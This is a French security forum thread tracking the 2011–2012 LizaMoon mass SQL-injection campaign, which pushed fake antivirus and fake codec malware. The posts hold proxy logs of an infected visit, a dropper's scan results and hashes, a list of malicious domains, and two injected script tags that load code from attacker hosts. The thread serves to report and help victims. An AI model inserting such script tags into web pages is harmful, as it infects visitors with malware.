LizaMoon Massive SQL injection attack : rogues/Scarewares

L'actualité & News Informatique!
Donc pas de demande d'aide dans cette partie.
Avatar de l’utilisateur
Malekal_morte
Site Admin
Site Admin
Messages : 94698
Inscription : 10 sept. 2005 13:57
Contact :

LizaMoon Massive SQL injection attack : rogues/Scarewares

Message par Malekal_morte » 03 avr. 2011 16:44

Une attaque par SQL injection a actuellement lieu depuis quelques jours.
Ces attaques conduisent à de fausses pages d'alertes faisant la promotion de Rogues/Scarewares.

230 000 sites WEB seraient actuellement touchés.

On enregistre effectivement un pic de demande de désinfection pour les rogues sur les forums depuis ces derniers jours, en témoignes cette courbe sur les téléchargement du programme RogueKller :
Image

Quelques liens sur l'attaque :


Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas

Sécuriser son ordinateur (version courte)

Tutoriels Logiciels - Tutoriel Windows - Windows 10

Stop publicités - popups intempestives
supprimer-trojan.com : guide de suppression de malwares

Partagez malekal.com : n'hésitez pas à partager sur Facebook et GooglePlus les articles qui vous plaisent.


Avatar de l’utilisateur
Malekal_morte
Site Admin
Site Admin
Messages : 94698
Inscription : 10 sept. 2005 13:57
Contact :

Re: LizaMoon Massive SQL injection attack : rogues/Scareware

Message par Malekal_morte » 04 avr. 2011 18:33

Pour la suppression, se reporter aussi à la page Rogues Attack : Windows Repair et MS Tool Removal
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas

Sécuriser son ordinateur (version courte)

Tutoriels Logiciels - Tutoriel Windows - Windows 10

Stop publicités - popups intempestives
supprimer-trojan.com : guide de suppression de malwares

Partagez malekal.com : n'hésitez pas à partager sur Facebook et GooglePlus les articles qui vous plaisent.

Avatar de l’utilisateur
Malekal_morte
Site Admin
Site Admin
Messages : 94698
Inscription : 10 sept. 2005 13:57
Contact :

Re: LizaMoon Massive SQL injection attack : rogues/Scareware

Message par Malekal_morte » 06 avr. 2011 18:35

1,5 millions de sites WEB touchés: http://community.websense.com/blogs/sec ... ction.aspx

Une vidéo de l'infection :
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas

Sécuriser son ordinateur (version courte)

Tutoriels Logiciels - Tutoriel Windows - Windows 10

Stop publicités - popups intempestives
supprimer-trojan.com : guide de suppression de malwares

Partagez malekal.com : n'hésitez pas à partager sur Facebook et GooglePlus les articles qui vous plaisent.

Avatar de l’utilisateur
Malekal_morte
Site Admin
Site Admin
Messages : 94698
Inscription : 10 sept. 2005 13:57
Contact :

Re: LizaMoon Massive SQL injection attack : rogues/Scareware

Message par Malekal_morte » 25 mai 2011 21:05

L'infection continue à faire parler d'elle : http://blog.sucuri.net/2011/05/lizamoon ... m-etc.html

La visite d'un site infecté donne ceci :

Code : Tout sélectionner

1306349772.950    310 192.168.1.27 TCP_MISS/200 439 GET http://portailcasino.com.woopra-ns.com/visit/ra=RM6XX7U204ZJ1SH1ILBHDYWAMN223KDC&cookie=WVKI2WRMUFS5P4VYASW027NUL9AC2W2S&vid=-1&meta=&alias=portailcasino.com&language=fr&page=%2F&pagetitle=PortailCasino%20-%20Renseignements%2C%20nouveaut%C3%A9s%20et%20information%20sur%20les%20casinos%20en%20ligne.&referer=&screen=1024x768&localtime=20%3A57 - DIRECT/173.192.76.130 text/javascript
1306349773.377    503 192.168.1.27 TCP_MISS/200 553 GET http://asweds.com/ur.php - DIRECT/202.75.41.26 text/html
1306349773.716    172 192.168.1.27 TCP_MISS/302 1049 GET http://www3.myfreescaner.co.be/?a026dba07=m%2Bzgl2ufq5aqi9Xcx56hi%2Baiz6yQk8mWYmOalcealFs%3D - DIRECT/77.79.13.219 text/html
1306349774.194    260 192.168.1.27 TCP_MISS/200 4612 GET http://www1.powerhchsecurity.vv.cc/sr1yi?w5rvo4rq8=m6Td4tOrr9ee3tDczueO2NHXopWnoqGa6eCZr6mVldTTqq2%2FyqyY1NalpJWam%2BHcsfDtjcKc0Z3WrprPuLybmNPOzLDe0ODq2eTenZjVs7WGmNqoraCwl6CZmaChlpGnqY%2Fn7dip5%2BmsZZjoodSssJuljtfc36LFptaepqrbZtev01rm5HWhoqebpZycoKWZidnh1tXi5XLp7eZnoN6x1uHcyuXLxNbY15HY4ZfW3p2c3e%2Foq6%2Fir97b7Yvkzcml29nX5ZectZ6pe5eotavp6Gbg3unZ09HPy9TYzOPhl9fo5FqkvJM%3D - DIRECT/79.133.196.82 text/html
1306349774.606    403 192.168.1.27 TCP_MISS/200 44224 GET http://www1.powerhchsecurity.vv.cc/5637222e.js - DIRECT/79.133.196.82 text/javascript
1306349778.226     85 192.168.1.27 TCP_MISS/302 693 GET http://www1.powerhchsecurity.vv.cc/PtRBn107_2208.php?w5rvo4rq8=m6Td4tOrr9ee3tDczueO2NHXopWnoqGa6eCZr6mVldTTqq2%2FyqyY1NalpJWam%2BHcsfDtjcKc0Z3WrprPuLybmNPOzLDe0ODq2eTenZjVs7WGmNqoraCwl6CZmaChlpGnqY%2Fn7dip5%2BmsZZjoodSssJuljtfc36LFptaepqrbZtev01rm5HWhoqebpZycoKWZidnh1tXi5XLp7eZnoN6x1uHcyuXLxNbY15HY4ZfW3p2c3e%2Foq6%2Fir97b7Yvkzcml29nX5ZectZ6pe5eotavp6Gbg3unZ09HPy9TYzOPhl9fo5FqkvJM%3D - DIRECT/79.133.196.82 text/html
1306349781.885   3520 192.168.1.27 TCP_MISS/200 370687 GET http://www1.epiccalsave.lookin.at/psaghd107_2208.php?k4eg3n=j6PQ05flotbP0cTG1eiH687PcZeZY6aL4NLHoJSS1MPY16iEuK5Z2titmpOah9vmnu3bw4SLyZzSotLIrKiXkt7M2qLkodDfo97KlszGoKe%2Bmcrmopxtl5VkpJ2empGVmJLm1dfZ4KeimFnlztSmnJmUkufV4qLNZcmcZZ%2FJoc6cx4fg5p6nmJtqmJtsppekj8fSzs3cz7Pc4quYlaDny%2BLOyNbEzeHG6JPOo5PJmJTM2%2BLc2p7d6s%2Fi25Gmys1w1tnk2YiWopGlp5uXsavc3mHe1OLdxMzNz9TU39PaYsjWoJOXto%2FW2MOv4MWz2NCiya2c2sqU - DIRECT/79.133.196.83 application/octet-stream
1306349785.246    277 192.168.1.27 TCP_MISS/200 463 GET http://portailcasino.com.woopra-ns.com/ping/vid=-1&cookie=WVKI2WRMUFS5P4VYASW027NUL9AC2W2S&alias=portailcasino.com&idle=0&vs=r&ra=BE70AVLZ0WXN89EXL979H3EJ8RKHYEHE - DIRECT/173.192.76.130 text/javascript
1306349797.509    283 192.168.1.27 TCP_MISS/200 463 GET http://portailcasino.com.woopra-ns.com/ping/vid=3050&cookie=WVKI2WRMUFS5P4VYASW027NUL9AC2W2S&alias=portailcasino.com&idle=0&vs=r&ra=ARMCR53DTL1O96JFFX0GX6OTJGN2043Z - DIRECT/173.192.76.130 text/javascript
1306349809.868    275 192.168.1.27 TCP_MISS/200 463 GET http://portailcasino.com.woopra-ns.com/ping/vid=3050&cookie=WVKI2WRMUFS5P4VYASW027NUL9AC2W2S&alias=portailcasino.com&idle=0&vs=r&ra=H2ULYQVDL9Y4X7UZUNMYX4DU97R6JT7I - DIRECT/173.192.76.130 text/javascript
1306349814.021     86 192.168.1.27 TCP_MISS/302 688 GET http://www1.powerhchsecurity.vv.cc/cF107_2208.php?w5rvo4rq8=m6Td4tOrr9ee3tDczueO2NHXopWnoqGa6eCZr6mVldTTqq2%2FyqyY1NalpJWam%2BHcsfDtjcKc0Z3WrprPuLybmNPOzLDe0ODq2eTenZjVs7WGmNqoraCwl6CZmaChlpGnqY%2Fn7dip5%2BmsZZjoodSssJuljtfc36LFptaepqrbZtev01rm5HWhoqebpZycoKWZidnh1tXi5XLp7eZnoN6x1uHcyuXLxNbY15HY4ZfW3p2c3e%2Foq6%2Fir97b7Yvkzcml29nX5ZectZ6pe5eotavp6Gbg3unZ09HPy9TYzOPhl9fo5FqkvJM%3D - DIRECT/79.133.196.82 text/html
1306349822.129    278 192.168.1.27 TCP_MISS/200 463 GET http://portailcasino.com.woopra-ns.com/ping/vid=3050&cookie=WVKI2WRMUFS5P4VYASW027NUL9AC2W2S&alias=portailcasino.com&idle=0&vs=r&ra=4P8XZV0LJTHUY0T5P84IN6C6JPQI6W0H - DIRECT/173.192.76.130 text/javascript
1306349834.400    277 192.168.1.27 TCP_MISS/200 463 GET http://portailcasino.com.woopra-ns.com/ping/vid=3050&cookie=WVKI2WRMUFS5P4VYASW027NUL9AC2W2S&alias=portailcasino.com&idle=0&vs=r&ra=NH3N5I1L1CKWGJDQD9VBA0OIJTMK4IPO - DIRECT/173.192.76.130 text/javascript
1306349846.656    274 192.168.1.27 TCP_MISS/200 463 GET http://portailcasino.com.woopra-ns.com/ping/vid=3050&cookie=WVKI2WRMUFS5P4VYASW027NUL9AC2W2S&alias=portailcasino.com&idle=0&vs=r&ra=QMKRBDO908VW1T3LT4HV8OTRY9W2I18P - DIRECT/173.192.76.130 text/javascript
et redirige vers une fausse page de scan qui est superposé au site web infecté :
Image

et qui droppe, à l'heure où sont écrites ces lignes, le dropper suivant : http://www3.malekal.com/malwares/index. ... b49c6306cd
File name: 40a98b34e7dfbdce30c314b49c6306cd
Submission date: 2011-05-25 19:01:30 (UTC)
Current status: finished
Result: 5 /41 (12.2%)


Antivirus Version Last Update Result
AhnLab-V3 2011.05.26.00 2011.05.25 -
AntiVir 7.11.8.140 2011.05.25 TR/Dropper.Gen2
Antiy-AVL 2.0.3.7 2011.05.25 -
Avast 4.8.1351.0 2011.05.25 -
Avast5 5.0.677.0 2011.05.25 -
AVG 10.0.0.1190 2011.05.25 -
BitDefender 7.2 2011.05.25 -
CAT-QuickHeal 11.00 2011.05.25 -
ClamAV 0.97.0.0 2011.05.25 -
Commtouch 5.3.2.6 2011.05.25 -
Comodo 8832 2011.05.25 -
DrWeb 5.0.2.03300 2011.05.25 -
eTrust-Vet 36.1.8347 2011.05.25 -
F-Prot 4.6.2.117 2011.05.24 -
F-Secure 9.0.16440.0 2011.05.25 Rogue:W32/FakeAv.BI
Fortinet 4.2.257.0 2011.05.25 W32/Injector.fam!tr
GData 22 2011.05.25 -
Ikarus T3.1.1.104.0 2011.05.25 -
Jiangmin 13.0.900 2011.05.25 -
K7AntiVirus 9.103.4720 2011.05.25 -
Kaspersky 9.0.0.837 2011.05.25 -
McAfee 5.400.0.1158 2011.05.25 -
McAfee-GW-Edition 2010.1D 2011.05.25 -
Microsoft 1.6903 2011.05.25 -
NOD32 6152 2011.05.25 -
Norman 6.07.07 2011.05.25 -
nProtect 2011-05-25.03 2011.05.25 -
Panda 10.0.3.5 2011.05.25 Suspicious file
PCTools 7.0.3.5 2011.05.19 -
Prevx 3.0 2011.05.25 -
Rising 23.59.02.05 2011.05.25 -
Sophos 4.65.0 2011.05.25 Mal/FakeAV-LJ
SUPERAntiSpyware 4.40.0.1006 2011.05.25 -
Symantec 20111.1.0.186 2011.05.25 -
TheHacker 6.7.0.1.207 2011.05.25 -
TrendMicro 9.200.0.1012 2011.05.25 -
TrendMicro-HouseCall 9.200.0.1012 2011.05.25 -
VBA32 3.12.16.0 2011.05.25 -
VIPRE 9386 2011.05.25 -
ViRobot 2011.5.25.4478 2011.05.25 -
VirusBuster 13.6.371.1 2011.05.25 -
Additional information
MD5 : 40a98b34e7dfbdce30c314b49c6306cd
SHA1 : 82687a86bca60c019487569901aae67b4aa2aa3b
SHA256: bdfb6324390e08d3d1f3c4578ba68823b60a83acdd40ecd979592872614e0e79
qui installe le rogue PC Security Gardian

Image
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas

Sécuriser son ordinateur (version courte)

Tutoriels Logiciels - Tutoriel Windows - Windows 10

Stop publicités - popups intempestives
supprimer-trojan.com : guide de suppression de malwares

Partagez malekal.com : n'hésitez pas à partager sur Facebook et GooglePlus les articles qui vous plaisent.

aem38
Messages : 1
Inscription : 22 juin 2011 15:23
Localisation : Grenoble

Re: LizaMoon Massive SQL injection attack : rogues/Scareware

Message par aem38 » 23 juin 2011 21:55

je tombe sur ton article et comprends mieux maintenant le désastre chez les clients …
est ce que le scareware Hard Drive Diagnostic fait partie du lot ?

En tt cas merci, ca m'a fait progresser sur ce sujet et découvrir le site !
J'ai perdu 3 heures today à cause de ces m*rd*s !

Et puis quand il s'agit de click, l'utilisateur n'a jamais rien fait !

Sebastien
:(


Avatar de l’utilisateur
Topxm
Geek à longue barbe
Geek à longue barbe
Messages : 7940
Inscription : 08 nov. 2007 22:53
Localisation : Cognac !!!!!

Re: LizaMoon Massive SQL injection attack : rogues/Scareware

Message par Topxm » 24 juin 2011 08:43

aem38,

Tu peux virer ta pub de ta signature STP

Pour ta question : hard-drive-diagnostic-t30165.html
Image

Avatar de l’utilisateur
Malekal_morte
Site Admin
Site Admin
Messages : 94698
Inscription : 10 sept. 2005 13:57
Contact :

Re: LizaMoon Massive SQL injection attack : rogues/Scareware

Message par Malekal_morte » 25 août 2011 10:59

stopthehacker.com prévient que l'injfection SQL recommence : http://www.stopthehacker.com/2011/08/24 ... ver-again/
voir aussi : http://blog.dynamoo.com/2010/12/beware- ... kscom.html

Quelques adresses de sites :
bookmono.com
bookmylo.com
bookaros.com
bookarra.com
booknunu.com
bookavio.com
bookgusa.com
bookmonn.com
bookpolo.com
bookdolo.com
bookfula.com
booksoco.com
bookvoxy.com
booksolo.com
booktuba.com
bookvila.com
bookvivi.com
booksgou.com
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas

Sécuriser son ordinateur (version courte)

Tutoriels Logiciels - Tutoriel Windows - Windows 10

Stop publicités - popups intempestives
supprimer-trojan.com : guide de suppression de malwares

Partagez malekal.com : n'hésitez pas à partager sur Facebook et GooglePlus les articles qui vous plaisent.

Avatar de l’utilisateur
Malekal_morte
Site Admin
Site Admin
Messages : 94698
Inscription : 10 sept. 2005 13:57
Contact :

Re: LizaMoon Massive SQL injection attack : rogues/Scareware

Message par Malekal_morte » 23 avr. 2012 10:17

C'est reparti pour une campagne :
<script src = http://hgbyju.com/r.php <</script>
<script src= http://nikjju.com/r.php ></script>
200,000k pages seraient touchées.

http://feedproxy.google.com/~r/SucuriSe ... r-php.html
http://feedproxy.google.com/~r/SucuriSe ... mised.html

~~

Le malware a changé et n'est plus de type Rogue.
De plus, on obtient plus une fausse page d'alerte mais une page faux codec (voir plus bas).
Le malware installé Backdoor.Win32.Proxyier qui change notamment les DNS vers 8.8.8.8
=> http://www3.malekal.com/malwares/index.php?&url=www2.

~~

Un exploit sur site WEB :

Code : Tout sélectionner

TCP_MISS/302 1117 GET http://www3.savetfmaster.com/?m60=kauZ156rm6aZk83msZKkk6qk356olquboJWsqZelpVo%3D - DIRECT/75.102.21.118 text/html
1335168520.166    140 192.168.1.27 TCP_MISS/200 2239 GET http://www1.powersuiterg.it.cx/2chy?sd3u=l9mj5a3Y6NLh4%2BeP6c7WpKiaZaiW3%2BDJr6abytbH5KTFuH6b3OK0l6akm9jnoundy7RZ19nTtMfRubuP2Njdz7DSluXk3djQmNbYprq3mNDjoWSuop2om6qhppemnJja58Wn6uOsqIvp3Nmmqp6Y2%2BfQcKehpqyYpqyqm6edmNvmoWSoo6Som6qmqZ%2BayeHU1M2hsufm7pig5tbf2dnY1NTXp9rindrU35nq1u7U2aTY25rq6pXpytiw3d3o1ZeatIllu5Whvdzp6qPO4dXe1uzRmOPk5uDR1qHY2OGKpK3V0KLclaG91dPa2o6mq%2BnP1Nhg3uOc6crV5erS6NLX1eeSlOjg55s%3D - DIRECT/217.23.8.104 text/html
TCP_MISS/200 18986 GET http://makkhanmaarke.com/menu.aspx - DIRECT/64.27.63.18 text/html
TCP_MISS/200 129813 GET http://www1.powersuiterg.it.cx/105d2b27.js - DIRECT/217.23.8.104 text/javascript
TCP_MISS/200 11238 GET http://makkhanmaarke.com/del.swf - DIRECT/64.27.63.18 application/x-shockwave-flash
TCP_MISS/200 9415 GET http://makkhanmaarke.com/menu1.swf - DIRECT/64.27.63.18 application/x-shockwave-flash
TCP_MISS/200 26246 GET http://www1.powersuiterg.it.cx/i.html - DIRECT/217.23.8.104 text/html
TCP_MISS/200 44509 GET http://makkhanmaarke.com/topflash.swf - DIRECT/64.27.63.18 application/x-shockwave-flash
TCP_MISS/200 261087 GET http://makkhanmaarke.com/fl1.swf - DIRECT/64.27.63.18 application/x-shockwave-flash
TCP_MISS/200 7226 GET http://www1.powersuiterg.it.cx/XtGIfQk.pdf - DIRECT/217.23.8.104 application/pdf
TCP_MISS/404 1940 GET http://www.employmentwild.com/blog/blog/pics/favicon.ico - DIRECT/196.220.41.89 text/html
TCP_MISS/404 1550 GET http://makkhanmaarke.com/favicon.ico - DIRECT/64.27.63.18 text/html
TCP_MISS/200 14292 GET http://www1.powersuiterg.it.cx/VjkJO.jar - DIRECT/217.23.8.104 application/java-archive
TCP_MISS/200 14292 GET http://www1.powersuiterg.it.cx/VjkJO.jar - DIRECT/217.23.8.104 application/java-archive
TCP_MISS/200 14292 GET http://www1.powersuiterg.it.cx/VjkJO.jar - DIRECT/217.23.8.104 application/java-archive
Pièces jointes
Faux_codec_scandsk.png
faux codec qui fait popose le fichier scandsk.exe
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas

Sécuriser son ordinateur (version courte)

Tutoriels Logiciels - Tutoriel Windows - Windows 10

Stop publicités - popups intempestives
supprimer-trojan.com : guide de suppression de malwares

Partagez malekal.com : n'hésitez pas à partager sur Facebook et GooglePlus les articles qui vous plaisent.


Répondre

Revenir vers « Actualité & News Informatique »